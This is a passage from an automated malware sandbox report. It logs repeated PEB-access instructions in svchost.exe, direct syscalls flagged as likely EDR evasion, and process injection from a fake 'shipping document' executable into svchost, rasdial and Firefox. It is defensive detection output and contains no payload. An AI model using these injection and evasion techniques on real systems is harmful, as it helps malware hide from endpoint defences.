            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD0C0 mov eax, dword ptr fs:[00000030h]2_2_033AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD0C0 mov eax, dword ptr fs:[00000030h]2_2_033AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329730 mov eax, dword ptr fs:[00000030h]2_2_03329730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329730 mov eax, dword ptr fs:[00000030h]2_2_03329730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03365734 mov eax, dword ptr fs:[00000030h]2_2_03365734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333973A mov eax, dword ptr fs:[00000030h]2_2_0333973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333973A mov eax, dword ptr fs:[00000030h]2_2_0333973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403749 mov eax, dword ptr fs:[00000030h]2_2_03403749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]2_2_033AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF72E mov eax, dword ptr fs:[00000030h]2_2_033EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03333720 mov eax, dword ptr fs:[00000030h]2_2_03333720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334F720 mov eax, dword ptr fs:[00000030h]2_2_0334F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334F720 mov eax, dword ptr fs:[00000030h]2_2_0334F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334F720 mov eax, dword ptr fs:[00000030h]2_2_0334F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F972B mov eax, dword ptr fs:[00000030h]2_2_033F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]2_2_03330710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]2_2_03360710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336F71F mov eax, dword ptr fs:[00000030h]2_2_0336F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336F71F mov eax, dword ptr fs:[00000030h]2_2_0336F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03337703 mov eax, dword ptr fs:[00000030h]2_2_03337703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03335702 mov eax, dword ptr fs:[00000030h]2_2_03335702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03335702 mov eax, dword ptr fs:[00000030h]2_2_03335702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]2_2_0336C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]2_2_03338770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B765 mov eax, dword ptr fs:[00000030h]2_2_0332B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B765 mov eax, dword ptr fs:[00000030h]2_2_0332B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B765 mov eax, dword ptr fs:[00000030h]2_2_0332B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B765 mov eax, dword ptr fs:[00000030h]2_2_0332B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]2_2_03330750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]2_2_033B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343740 mov eax, dword ptr fs:[00000030h]2_2_03343740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343740 mov eax, dword ptr fs:[00000030h]2_2_03343740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343740 mov eax, dword ptr fs:[00000030h]2_2_03343740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B73C mov eax, dword ptr fs:[00000030h]2_2_0340B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B73C mov eax, dword ptr fs:[00000030h]2_2_0340B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B73C mov eax, dword ptr fs:[00000030h]2_2_0340B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B73C mov eax, dword ptr fs:[00000030h]2_2_0340B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335D7B0 mov eax, dword ptr fs:[00000030h]2_2_0335D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F7BA mov eax, dword ptr fs:[00000030h]2_2_0332F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B97A9 mov eax, dword ptr fs:[00000030h]2_2_033B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BF7AF mov eax, dword ptr fs:[00000030h]2_2_033BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BF7AF mov eax, dword ptr fs:[00000030h]2_2_033BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BF7AF mov eax, dword ptr fs:[00000030h]2_2_033BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BF7AF mov eax, dword ptr fs:[00000030h]2_2_033BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BF7AF mov eax, dword ptr fs:[00000030h]2_2_033BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]2_2_033307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF78A mov eax, dword ptr fs:[00000030h]2_2_033EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333D7E0 mov ecx, dword ptr fs:[00000030h]2_2_0333D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]2_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033357C0 mov eax, dword ptr fs:[00000030h]2_2_033357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033357C0 mov eax, dword ptr fs:[00000030h]2_2_033357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033357C0 mov eax, dword ptr fs:[00000030h]2_2_033357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034037B6 mov eax, dword ptr fs:[00000030h]2_2_034037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]2_2_033B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]2_2_0334E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F626 mov eax, dword ptr fs:[00000030h]2_2_0332F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]2_2_03366620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]2_2_03368620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]2_2_0333262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03333616 mov eax, dword ptr fs:[00000030h]2_2_03333616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03333616 mov eax, dword ptr fs:[00000030h]2_2_03333616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]2_2_03372619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03361607 mov eax, dword ptr fs:[00000030h]2_2_03361607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]2_2_033AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336F603 mov eax, dword ptr fs:[00000030h]2_2_0336F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]2_2_03362674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03369660 mov eax, dword ptr fs:[00000030h]2_2_03369660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03369660 mov eax, dword ptr fs:[00000030h]2_2_03369660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]2_2_0334C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03405636 mov eax, dword ptr fs:[00000030h]2_2_03405636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033276B2 mov eax, dword ptr fs:[00000030h]2_2_033276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033276B2 mov eax, dword ptr fs:[00000030h]2_2_033276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033276B2 mov eax, dword ptr fs:[00000030h]2_2_033276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]2_2_033666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]2_2_0336C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D6AA mov eax, dword ptr fs:[00000030h]2_2_0332D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D6AA mov eax, dword ptr fs:[00000030h]2_2_0332D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B368C mov eax, dword ptr fs:[00000030h]2_2_033B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B368C mov eax, dword ptr fs:[00000030h]2_2_033B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B368C mov eax, dword ptr fs:[00000030h]2_2_033B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B368C mov eax, dword ptr fs:[00000030h]2_2_033B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ED6F0 mov eax, dword ptr fs:[00000030h]2_2_033ED6F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C36EE mov eax, dword ptr fs:[00000030h]2_2_033C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C36EE mov eax, dword ptr fs:[00000030h]2_2_033C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C36EE mov eax, dword ptr fs:[00000030h]2_2_033C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C36EE mov eax, dword ptr fs:[00000030h]2_2_033C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C36EE mov eax, dword ptr fs:[00000030h]2_2_033C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C36EE mov eax, dword ptr fs:[00000030h]2_2_033C36EE

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
